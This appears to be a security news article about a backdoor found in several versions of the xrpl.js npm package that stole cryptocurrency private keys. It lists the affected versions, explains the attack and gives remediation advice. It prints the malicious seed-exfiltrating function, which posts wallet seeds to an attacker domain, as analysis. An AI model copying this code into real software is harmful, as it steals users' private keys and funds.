Backdoored xrpl.js NPM Package Steals Keys (CVE‑2025‑32965)

Security researchers at Aikido Security discovered that multiple versions of Ripple's official xrpl.js NPM package were compromised with malicious code designed to exfiltrate cryptocurrency private keys to an attacker-controlled server.¹

The backdoored library, which has over 140 000 weekly downloads, posed a significant security risk to XRP Ledger developers and users relying on the compromised versions.¹

The Compromised Packages

The supply chain attack affected the following versions of the xrpl.js library:

• Version 4.2.1
• Version 4.2.2
• Version 4.2.3
• Version 4.2.4
• Version 2.14.2

The malicious packages were first published on April 21, 2025, at 20:53 GMT by a user named "mukulljangid". Notably, these versions did not match the official releases on GitHub, where the latest release was version 4.2.0, immediately raising suspicion.¹

How the Backdoor Works

Aikido Security's threat intelligence system, Aikido Intel, detected suspicious code in the compromised versions of the package. The malicious code was inserted into src/index.ts and included a seemingly innocuous function called checkValidityOfSeed that secretly exfiltrated private keys.¹

const validSeeds = new Set<string>([])
export function checkValidityOfSeed(seed: string) {
  if (validSeeds.has(seed)) return
  validSeeds.add(seed)
  fetch("https://0x9c[.]xyz/xc", { method: 'POST', headers: { 'ad-referral': seed, } })
}

This backdoor function was strategically placed in critical locations within the codebase, including the Wallet class constructor and various methods that handle key derivation. When users created wallets or imported keys, the malicious code would silently transmit their private keys to the attacker's server via HTTPS requests.¹

Researchers found that the attack evolved through multiple iterations, with earlier versions (4.2.1-4.2.2) containing manually modified JavaScript files, while later versions (4.2.3-4.2.4) had the backdoor directly inserted into the TypeScript source code.

Impact and Remediation

The attack specifically targeted the NPM distribution of the package; the GitHub repository remained unaffected. Users who installed these compromised versions may have had their XRP wallet private keys compromised, potentially allowing attackers to gain unauthorized access to cryptocurrency funds.²

The XRP Ledger Foundation quickly responded by releasing clean versions 4.2.5 and 2.14.3 to address the vulnerability. However, simply updating to a secure version is not sufficient for users who may have already been compromised.²

Users who used any of the affected versions should take the following actions immediately:²

1. Rotate all cryptographic keys used with the affected systems
2. Transfer funds to secure wallets with newly generated keys
3. Disable compromised master keys using the XRP Ledger's key rotation features
4. Assign new regular key pairs to affected accounts

Supply Chain Security Considerations

This incident highlights the continuing risk of software supply chain attacks targeting package managers like NPM. The compromise demonstrates sophisticated techniques where attackers:

1. Released multiple versions with increasingly sophisticated backdoor implementations
2. Used domain names designed to appear non-suspicious (0x9c[.]xyz)
3. Targeted a widely-used cryptocurrency library with high-value assets.

Organizations using NPM packages in their development workflows should implement additional security measures such as:

• Using lockfiles to pin dependencies to verified versions
• Implementing integrity verification for package signatures
• Conducting regular security audits of dependency trees
• Monitoring for unexpected package version updates²

Final Thoughts

The xrpl.js backdoor incident represents a concerning evolution in supply chain attacks targeting the cryptocurrency sector. This was not an opportunistic attack but a sophisticated operation specifically designed to compromise high-value targets: cryptocurrency wallets holding potentially significant assets.¹

The rapid identification and response by the security community and the XRP Ledger Foundation demonstrate the value of independent security monitoring systems and transparent security processes.

What makes this attack particularly noteworthy is that it targeted official package releases rather than relying on typosquatting or dependency confusion techniques seen in previous npm attacks.

The threat actors gained access to publishing credentials for a legitimate package with a large user base, highlighting the critical importance of securing not just code repositories but also package publishing pipelines.²

As software supply chain attacks continue to increase in sophistication, developers working in the cryptocurrency space must implement defense-in-depth strategies that assume compromise at some point in the dependency chain. This means implementing runtime protections, least-privilege principles, and comprehensive monitoring—especially when handling sensitive cryptographic operations.

Related Articles

• Windows NTLM Hash Leak CVE-2025-24054 Under Active Exploitation: Patch Now to Prevent Credential Theft
• Oracle Cloud Credentials Leak: CISA Issues Urgent Guidance
• Critical Microsoft Zero-Day Vulnerability CVE-2025-29824: What You Need to Know